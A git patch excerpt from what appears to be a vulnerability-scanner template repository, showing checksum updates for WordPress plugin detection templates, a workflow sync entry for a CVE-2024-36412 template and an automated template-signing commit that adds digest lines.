+http/technologies/wordpress/plugins/header-footer.yaml:2ae48585ed4c1165d6ad81bd1f6f7d59d3513954 +http/technologies/wordpress/plugins/health-check.yaml:77ad7cbc5ee2680cad3f611d966e136af0b926cb +http/technologies/wordpress/plugins/hello-dolly.yaml:701433e5674c850940b215ee57921c8c3470de2c +http/technologies/wordpress/plugins/host-webfonts-local.yaml:94e0c3e02b86ae2f03e3c7db67832b6129d2551b +http/technologies/wordpress/plugins/hostinger.yaml:2a1f986c21a4b8b924e5278f5e8ce24a7f1d0945 +http/technologies/wordpress/plugins/image-optimization.yaml:7a784c85552acc5dcc36c4024f5820264c0134f2 +http/technologies/wordpress/plugins/imagify.yaml:a4893fcc8793efc8a0cbdd787eaed21cb5e88764 +http/technologies/wordpress/plugins/imsanity.yaml:2fcb947b41b1338ac47167f128d6792e8a571cba +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:da0b89dcdf3ed67e75d6a5e6f741dbd7817ad145 +http/technologies/wordpress/plugins/instagram-feed.yaml:6e6451ce4e9a77154ff684b75a6b981d2ebf18c6 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:3aed86182c5f4bf9c680ddd4a693b3f97024ebe1 +http/technologies/wordpress/plugins/iwp-client.yaml:03c3b5b748ec92a6a189d126aa4a4937805a609f +http/technologies/wordpress/plugins/jetpack-boost.yaml:2d514e702843fe225f98b170c08aa60c3911199f +http/technologies/wordpress/plugins/jetpack.yaml:818375d4703513e2fe3c72ed25b2539a8fcd6989 +http/technologies/wordpress/plugins/kadence-blocks.yaml:3d0a6546bd680797472567d621055aa8a52f5d60 +http/technologies/wordpress/plugins/kirki.yaml:0be53e6e09fdbd5fae315252b736a6c04273a035 +http/technologies/wordpress/plugins/leadin.yaml:c9bad5d8266d0a85e78e97de9d047047b42aea98 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:8d71e25eb8d91c5be350267c4d3d6305a1e4dd01 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:71a351dc259b8a32f3f1c02d4963fc96e3f8ae2e +http/technologies/wordpress/plugins/litespeed-cache.yaml:0d13c426f2ee2c0a9f2c9b9d00092d566656e1d8 +http/technologies/wordpress/plugins/loco-translate.yaml:752b781422374a28e28dd903f615bbcc75f8ad98 +http/technologies/wordpress/plugins/loginizer.yaml:84ea45d7007b9cdb260f2eb0674ee1450f1ee9cd http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea -http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d -http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd -http/technologies/wordpress/plugins/mainwp-child.yaml:80de34e84d55586e5eda37d00d277aad7f4b2451 -http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 -http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 -http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e -http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 -http/technologies/wordpress/plugins/metform.yaml:aaa8b95a995e3345112a288f66e705b150968e7e -http/technologies/wordpress/plugins/ml-slider.yaml:104ad761a31985f8f0947e3e0b9bf872fe1f2c2a -http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c -http/technologies/wordpress/plugins/nextgen-gallery.yaml:f00d03dc0f365956376cec268c45bd669729260e -http/technologies/wordpress/plugins/ninja-forms.yaml:cc29026bcd3c62478d5147fd80a8b3a560bfe728 -http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 -http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 -http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7 -http/technologies/wordpress/plugins/password-protected.yaml:b990fff1f3337e512694df82458fcf4d4f50c85c -http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:05ee8ed37ceadca94ff66df14cee10c8b52d24d1 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:313c79f7e0e8f362ab5433d6c721ac73d0cf44fa +http/technologies/wordpress/plugins/mailpoet.yaml:77204b61a8a8f54a1b23f9407f43de4382d99ab1 +http/technologies/wordpress/plugins/maintenance.yaml:ccffa8d0871f5816ff8db4d1a959715287f3ac30 +http/technologies/wordpress/plugins/mainwp-child.yaml:53bc2115d4bab847d6fce21fa743b6fecaaa3059 +http/technologies/wordpress/plugins/malcare-security.yaml:add3736084b60ef7597f55f53512bc8221980321 +http/technologies/wordpress/plugins/megamenu.yaml:8529ad23f49363a7661d3da8c0568885843bcee6 +http/technologies/wordpress/plugins/members.yaml:8b51c0fa00650de28c88e870d1851f6e9cdef39d +http/technologies/wordpress/plugins/meta-box.yaml:f6781cc6657aeaa3fdf6e4bc2cd1f2647cead027 +http/technologies/wordpress/plugins/metform.yaml:46475fe67f8a574aea7dd48f6f9ea99bd1f880be +http/technologies/wordpress/plugins/ml-slider.yaml:fd5451c7273298d457cb63a5520a852fcad65e98 +http/technologies/wordpress/plugins/newsletter.yaml:e4bf7923f0399e3445a0e66db0661abd126ba086 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:8419f931966aeeec0a2654381b5f5e6c78ece749 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:bad2667a6169389f5d1929b633a064520b5fef83 +http/technologies/wordpress/plugins/ninja-forms.yaml:d3efaddc0299928c6eff466fb3e39e5625049c7d +http/technologies/wordpress/plugins/ocean-extra.yaml:4d6a98ba8eadef3545c52ca0090778407db7a96e +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:dd2d97d05fbf75167b48e931c81d4ac4bd8dcda8 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:6391170313f2e41f2d3e592feaf9316cd46dfbef +http/technologies/wordpress/plugins/optinmonster.yaml:6ff8ddf6e245287b49b1c96f26cf9af2b7e1835b +http/technologies/wordpress/plugins/otter-blocks.yaml:732354dc8855ba9e74de9ee8bfed83039c18ba58 +http/technologies/wordpress/plugins/password-protected.yaml:63d91e0d7e457a6f5de281277554577e915547bd +http/technologies/wordpress/plugins/pdf-embedder.yaml:ad606d12b8afb875a0088bac31115d0688c12d66 http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5 -http/technologies/wordpress/plugins/pixelyoursite.yaml:ba9797f8208c7c3ed5cb45048764d8ecd0a62835 -http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:60c36e273a7f20fc3aee1786d40f73640f24a325 +http/technologies/wordpress/plugins/pixelyoursite.yaml:ce2a0c0fb077c68ed37657f913eecd79bef0c3c6 +http/technologies/wordpress/plugins/polylang.yaml:15c4f4eea4b33d829da980bd07d7f44e61da74a4 http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:0838742608b1265516017095ccd495332e6a5991 -http/technologies/wordpress/plugins/post-smtp.yaml:754dd57d96b6f4456c570c7034a2ddf3056539f4 -http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 -http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:195ac372f24aa1feb8c48fba65a97149f05e137f -http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 -http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:9f6476b40090f693001f2da81075d5b3e650c2e3 -http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:d3871c6333178618d88df609d41ea9e626c1e312 -http/technologies/wordpress/plugins/sg-cachepress.yaml:557b4e350cd47eafc012c39dad25d48d6b397de0 -http/technologies/wordpress/plugins/sg-security.yaml:4d092558c2718bd98454bbec4adf942903cec393 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 -http/technologies/wordpress/plugins/simple-history.yaml:8441cfcd6437b914c70f78136d76cdeb85e261a0 +http/technologies/wordpress/plugins/popup-maker.yaml:df03adf66a0258b5ea7c2dcfa8fcace891c5755e +http/technologies/wordpress/plugins/post-smtp.yaml:aadc8d632b6d59e8a3d3673b0e3b0cf61850f503 +http/technologies/wordpress/plugins/post-types-order.yaml:d1e1c3cd67b1e315814c180e5e7f2860fce2aa52 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:19b1954a3969722e0e13231275237f37c2ebbd1a +http/technologies/wordpress/plugins/pretty-link.yaml:f9f9edd15c9de3420031dcb0eccecac8073809ce +http/technologies/wordpress/plugins/really-simple-captcha.yaml:5b0db99d052651b70c406f12f797c9310d058928 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:ebda27af0811ea80e3c4fee294959c2096e835cc +http/technologies/wordpress/plugins/redirection.yaml:62196b58a7219a5ba15908eac23070569939f9d8 +http/technologies/wordpress/plugins/redux-framework.yaml:b38088854e37530d56be3e573ab35d74ae7a00e2 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:adb28f8b872294c20d557257cac5d8cb6a951b09 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:20db878c50ec9a33d53e44c7dfd60b03f967bdd5 +http/technologies/wordpress/plugins/safe-svg.yaml:25035832d830765564a3ccc56114d1a1eaa15e39 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:e38b531d39c1775b18c114941f758ff7e8274cf2 +http/technologies/wordpress/plugins/sg-cachepress.yaml:4f6557447181f12dfa4168c60776231743fbd31a +http/technologies/wordpress/plugins/sg-security.yaml:e2dd2c42814ef3c35937fee2433f772ba866857b +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:9c268217f1279303fa6a7f91beef5f32cb29326d +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:ef99f6136262d4a9a5827d1c09bff75ed196eaa9 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:68af0493c05981c232cb24ca5d1ea4c3f4f57b65 +http/technologies/wordpress/plugins/simple-history.yaml:f16941eb525ba680f2e0d25cc953e3065ac277a7 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 -http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f3961e9e08694816f33e638acf1af19b4262a840 +http/technologies/wordpress/plugins/siteguard.yaml:91a6c90459f13ebf894b06ce59d5e3504a09e8dd +http/technologies/wordpress/plugins/siteorigin-panels.yaml:cd3c8e162eafe3ee17a5f360747a3db7fa1023b0 +http/technologies/wordpress/plugins/smart-slider-3.yaml:70907bbc5e294b97c3c83720647943ade6e7fb49 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:5cf1976a4f9558993a3d52abd3d4db127e181e58 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:9edb30d645fe661041ea30371023297ba0f84558 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f -http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 -http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa -http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 -http/technologies/wordpress/plugins/templately.yaml:c38b29f2acd823339a5f6e47b6da7d81815bf75b -http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:5e9df7d3ae102f3666a072fc506fdaf4d97d61e3 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:36b37389569a049515789ef5e39a77d879d780b1 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:9db34094f73e51d5e50201519d6b56a3792fce7d +http/technologies/wordpress/plugins/svg-support.yaml:970b308fc2ffebd1b6a85fed45d50e214eff3555 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:2cc13126225bd94123c023c752b9be9c8dacdac4 +http/technologies/wordpress/plugins/tablepress.yaml:f61492167ba912f3adb92c67beee5edc8f31d356 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b6185c6d25be668ccf874f0ebd656ef6fa1d2629 +http/technologies/wordpress/plugins/templately.yaml:3e41caede4c5a76f092d016c6d22e9a0b19e23e7 +http/technologies/wordpress/plugins/the-events-calendar.yaml:01e562cbf58d77f6d81d318c83ce8737e40d8233 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:5fc184d6e1eb819dc98519af81c48502b499de9a -http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:aefb6f0f89e8d56a13dcee3d9b575761f036eee5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:a3797a4180e5d161d84f1449ca3b46b37bcbe6e6 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:ca0ce5bf2c2613dfd55bda218938305a686d71b7 +http/technologies/wordpress/plugins/under-construction-page.yaml:3dbd88ad90b1f0d6902661691fccf9810dbab5a1 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:0869ebd3a5621b5613665f63be4e3bdb52d4f58e +http/technologies/wordpress/plugins/updraftplus.yaml:c18db723278fb99316821b9ade5d5d91a4bc783d http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 +http/technologies/wordpress/plugins/user-role-editor.yaml:989adba2e4dde4e9239e72a5c007e7310604b51a http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 -http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 +http/technologies/wordpress/plugins/w3-total-cache.yaml:d1bcce5859d07d3d6611341ba88432d8669276ad +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:b7a02ca357dd4f3af730aa152749f94262786082 +http/technologies/wordpress/plugins/webp-express.yaml:96fb2779bbbb0ebdd1a3ed27d2c1b3cced36eebc +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:1762aae249403173a168b0be31f61fdf28e35157 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:b6c736fdd1511d1856039ab3203f177e380c5d21 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c69f3ac4aafaed3333de562856cf11bf5bda097a +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:51e72b5b7dedf8f21a5245b0884b93806db974f2 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:961b2182decfa0e47bddb3a9435229fb28c9c7d3 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:3e379163d373241c2e7a2ad497824f95689ee220 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee -http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba -http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 -http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 -http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 -http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:172408b3e5d45e51d8cc279b901d4ae16c517809 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:b57da79faf5ee13415c55f6ff542ee85573dd036 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:482f58b607236a4678d8cd219339f7b8873bd5c2 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:78652be29ebe090e2f3ab8088bff268d38402a2b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:a2c8bddfca83c004f7b3491c75ed4b7699ad005d +http/technologies/wordpress/plugins/woocommerce-services.yaml:029c7448578ea6daea0b23f8416627ea575f6a78 +http/technologies/wordpress/plugins/woocommerce.yaml:a585ff3c24472097b1cc770bb06177f15e1bb240 +http/technologies/wordpress/plugins/wordfence.yaml:eb5fb241b54cf2ffd270a176b42d3b0714f59d54 +http/technologies/wordpress/plugins/wordpress-importer.yaml:2d3d76e3df891985ec78f4524ef0684dcbd00cd8 +http/technologies/wordpress/plugins/wordpress-seo.yaml:a3808a512cd2cc9e6d620c9e18f25498339983ba http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 -http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a -http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 -http/technologies/wordpress/plugins/wp-optimize.yaml:5e49fe0cc33e1186de691ecb2a3200205d01a211 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 -http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 -http/technologies/wordpress/plugins/wp-rollback.yaml:145d49708d027968e845531a36739f52eeb1ff3d -http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 -http/technologies/wordpress/plugins/wp-smushit.yaml:977dd38e8ed67dad650e1bb90aae4b7074ff3ce5 -http/technologies/wordpress/plugins/wp-statistics.yaml:d274d87bcb46e8464ef502d06f790cdb0bf920bd -http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f +http/technologies/wordpress/plugins/worker.yaml:2e63918b99177134d764b6f77b0aaed3569e3e60 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:32b185cb3628223d0fa026b700d14d0f17abcd09 +http/technologies/wordpress/plugins/wp-file-manager.yaml:ce79f708a701ef15382ea87a5b5ad8ca949753bd +http/technologies/wordpress/plugins/wp-google-maps.yaml:e5f53bb3663c9789a123ea9d0db3520f21bec878 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:b663be5227e76924444ab19b9cdf80e3dc8f2026 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:db3c2040e707d38b65adb5b27d29f49af354f4ad +http/technologies/wordpress/plugins/wp-migrate-db.yaml:80c3863637b1bdc610df7df523ac8547ee650eb9 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:48cb74ac3cc5eb5f8253485bd1710d1a80a31be8 +http/technologies/wordpress/plugins/wp-optimize.yaml:12cf7b400ef85581e2e6b2d6f587c163288bb07e +http/technologies/wordpress/plugins/wp-pagenavi.yaml:a51ebfe71c01c0601d410d1a86190c9aab27fa02 +http/technologies/wordpress/plugins/wp-reset.yaml:dc51aa0045a3821412ec8a7c6d2342d1b166af40 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:f6473d6332703726ea217f9133a3c45a1039e3a4 +http/technologies/wordpress/plugins/wp-rollback.yaml:5f9d2aa7b1880abc38a705f1b35de3f35e7d2248 +http/technologies/wordpress/plugins/wp-seopress.yaml:9a9763f016164dbc51d6fcc2e110c8b9dcb7f3d0 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:dc76a3fea22b2a6bb34f8745c6405081c554397b +http/technologies/wordpress/plugins/wp-smushit.yaml:f1002bd613a6872989f419af97049d6cc4644675 +http/technologies/wordpress/plugins/wp-statistics.yaml:cf28b9f684a0fa1a7937c6ab825e9c37af25dd3f +http/technologies/wordpress/plugins/wp-super-cache.yaml:186e5dbf697d5c357727b47f7de4f031c704568c http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 -http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 -http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:ef68a5ff6058130b28757cab22c62add2f40e8ac +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:908c7abc2b8386528c8e7011090de05f4de329dd +http/technologies/wordpress/plugins/wpforms-lite.yaml:c76d3b5344fc4902127ba97d3e6e6ce4d6bd753c +http/technologies/wordpress/plugins/wps-hide-login.yaml:acfb1e72d0b4b6ea9ce72a941e3f4a42c0dab055 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:9af0a635143381ca9b03c03651f485981da14942 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:10c83a981ebaf9458df805b8236d8e5d8a8f0fea http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8690,7 +8691,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:0915c262bcf1b284663e2fe86f9e4f168cdb75e9 +templates-checksum.txt:552511bdf125df22f492d97128e68a0faadcf17c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 8a629b9d365eab8d6fcb84675afdbcb5974a783a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 21 Jun 2024 05:39:56 +0000 Subject: [PATCH 0486/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 41e708cfa3..b63af74017 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -38,6 +38,7 @@ on: - 'http/cves/2024/CVE-2024-3274.yaml' - 'http/cves/2024/CVE-2024-34982.yaml' - 'http/cves/2024/CVE-2024-3552.yaml' + - 'http/cves/2024/CVE-2024-36412.yaml' - 'http/cves/2024/CVE-2024-36837.yaml' - 'http/cves/2024/CVE-2024-37393.yaml' - 'http/default-logins/mantisbt/mantisbt-anonymous-login.yaml' From 9eec4a72e18ff2600397e84994c28f5e8f53f472 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 21 Jun 2024 05:41:08 +0000 Subject: [PATCH 0487/1841] Auto Template Signing [Fri Jun 21 05:41:07 UTC 2024] :robot: --- http/cves/2024/CVE-2024-36412.yaml | 1 + http/default-logins/mantisbt/mantisbt-anonymous-login.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2024/CVE-2024-36412.yaml b/http/cves/2024/CVE-2024-36412.yaml index b189e5eb2c..aa9c3b111b 100644 --- a/http/cves/2024/CVE-2024-36412.yaml +++ b/http/cves/2024/CVE-2024-36412.yaml @@ -40,3 +40,4 @@ http: - 'status_code == 200' - 'contains_any(body, "You have already responded to the invitation or there", "Thank you for accepting")' condition: and +# digest: 